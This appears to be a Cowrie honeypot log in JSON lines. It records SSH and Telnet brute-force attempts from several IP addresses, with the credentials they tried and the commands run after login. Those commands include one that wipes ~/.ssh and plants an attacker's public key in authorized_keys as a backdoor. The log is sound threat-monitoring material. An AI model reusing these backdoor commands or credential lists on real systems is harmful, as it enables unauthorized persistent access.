{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:52.837508Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":54242,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b48312a34c1","protocol":"ssh","message":"New connection: 24.108.102.132:54242 (1.2.3.4:22) [session: 0b48312a34c1]","sensor":"my-vps","timestamp":"2025-08-26T00:32:53.349645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:53.355229Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:53.529114Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.login.success","username":"root","password":"k","message":"login attempt [root/k] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:32:53.952680Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Hello2024@","message":"login attempt [root/Hello2024@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.223654Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:32:54.543923Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.544584Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.545642Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:32:54.639778Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.640460Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.641285Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.814276Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:54.817000Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:32:55.183762Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.184741Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.369832Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.370755Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:32:55.457765Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.458481Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":46188,"dst_ip":"1.2.3.4","dst_port":22,"session":"55c3bdf71f3a","protocol":"ssh","message":"New connection: 24.108.102.132:46188 (1.2.3.4:22) [session: 55c3bdf71f3a]","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.505124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.516034Z","src_ip":"24.108.102.132","session":"55c3bdf71f3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:55.677917Z","src_ip":"24.108.102.132","session":"55c3bdf71f3a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:32:56.314258Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:56.315673Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:32:56.348845Z","src_ip":"24.108.102.132","session":"55c3bdf71f3a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":57204,"dst_ip":"1.2.3.4","dst_port":22,"session":"db53134b6979","protocol":"ssh","message":"New connection: 27.112.78.245:57204 (1.2.3.4:22) [session: db53134b6979]","sensor":"my-vps","timestamp":"2025-08-26T00:32:56.582889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:56.583836Z","src_ip":"27.112.78.245","session":"db53134b6979"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:56.847874Z","src_ip":"27.112.78.245","session":"db53134b6979"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:57.516126Z","src_ip":"24.108.102.132","session":"55c3bdf71f3a"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":46200,"dst_ip":"1.2.3.4","dst_port":22,"session":"971866d17be0","protocol":"ssh","message":"New connection: 24.108.102.132:46200 (1.2.3.4:22) [session: 971866d17be0]","sensor":"my-vps","timestamp":"2025-08-26T00:32:57.667418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:57.678355Z","src_ip":"24.108.102.132","session":"971866d17be0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:57.846000Z","src_ip":"24.108.102.132","session":"971866d17be0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:32:57.928954Z","src_ip":"27.112.78.245","session":"db53134b6979"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:32:58.517768Z","src_ip":"24.108.102.132","session":"971866d17be0"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:58.686025Z","src_ip":"24.108.102.132","session":"971866d17be0"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:58.689128Z","src_ip":"24.108.102.132","session":"0b48312a34c1"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:32:59.366143Z","src_ip":"27.112.78.245","session":"db53134b6979"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":57210,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9fa74440339","protocol":"ssh","message":"New connection: 27.112.78.245:57210 (1.2.3.4:22) [session: d9fa74440339]","sensor":"my-vps","timestamp":"2025-08-26T00:32:59.628776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:32:59.629932Z","src_ip":"27.112.78.245","session":"d9fa74440339"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:32:59.896734Z","src_ip":"27.112.78.245","session":"d9fa74440339"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:33:00.999693Z","src_ip":"27.112.78.245","session":"d9fa74440339"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:01.266106Z","src_ip":"27.112.78.245","session":"7faa670ca7e8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:01.267186Z","src_ip":"27.112.78.245","session":"d9fa74440339"}
{"eventid":"cowrie.session.closed","duration":12.730265378952026,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:04.837194Z","src_ip":"212.227.125.160","session":"55036f371035"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41244,"dst_ip":"1.2.3.4","dst_port":23,"session":"8fc526873abd","protocol":"telnet","message":"New connection: 212.227.125.160:41244 (1.2.3.4:23) [session: 8fc526873abd]","sensor":"my-vps","timestamp":"2025-08-26T00:33:05.115733Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57762,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbf4ae34b04d","protocol":"ssh","message":"New connection: 212.227.125.160:57762 (1.2.3.4:22) [session: cbf4ae34b04d]","sensor":"my-vps","timestamp":"2025-08-26T00:33:10.104693Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:10.159586Z","src_ip":"212.227.125.160","session":"cbf4ae34b04d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46232,"dst_ip":"1.2.3.4","dst_port":23,"session":"cc3e5a0e75be","protocol":"telnet","message":"New connection: 212.227.125.160:46232 (1.2.3.4:23) [session: cc3e5a0e75be]","sensor":"my-vps","timestamp":"2025-08-26T00:33:11.067439Z"}
{"eventid":"cowrie.session.closed","duration":12.741169452667236,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:17.856832Z","src_ip":"212.227.125.160","session":"8fc526873abd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41576,"dst_ip":"1.2.3.4","dst_port":23,"session":"5df7a0ea99bc","protocol":"telnet","message":"New connection: 212.227.125.160:41576 (1.2.3.4:23) [session: 5df7a0ea99bc]","sensor":"my-vps","timestamp":"2025-08-26T00:33:18.006059Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.85.101","src_port":58664,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0f88d0fa543","protocol":"ssh","message":"New connection: 196.251.85.101:58664 (1.2.3.4:22) [session: a0f88d0fa543]","sensor":"my-vps","timestamp":"2025-08-26T00:33:18.925326Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:18.940499Z","src_ip":"196.251.85.101","session":"a0f88d0fa543"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.28","src_port":32820,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c56e6d570ed","protocol":"telnet","message":"New connection: 176.65.148.28:32820 (1.2.3.4:23) [session: 1c56e6d570ed]","sensor":"my-vps","timestamp":"2025-08-26T00:33:24.886426Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:33:24.923125Z","src_ip":"176.65.148.28","session":"1c56e6d570ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:33:24.944778Z","src_ip":"176.65.148.28","session":"1c56e6d570ed"}
{"eventid":"cowrie.session.closed","duration":12.785247087478638,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:33:30.791224Z","src_ip":"212.227.125.160","session":"5df7a0ea99bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41881,"dst_ip":"1.2.3.4","dst_port":23,"session":"d157830a48f9","protocol":"telnet","message":"New connection: 212.227.125.160:41881 (1.2.3.4:23) [session: d157830a48f9]","sensor":"my-vps","timestamp":"2025-08-26T00:33:30.985539Z"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":41130,"dst_ip":"1.2.3.4","dst_port":22,"session":"17cf67f619de","protocol":"ssh","message":"New connection: 36.89.28.139:41130 (1.2.3.4:22) [session: 17cf67f619de]","sensor":"my-vps","timestamp":"2025-08-26T00:33:35.708814Z"}
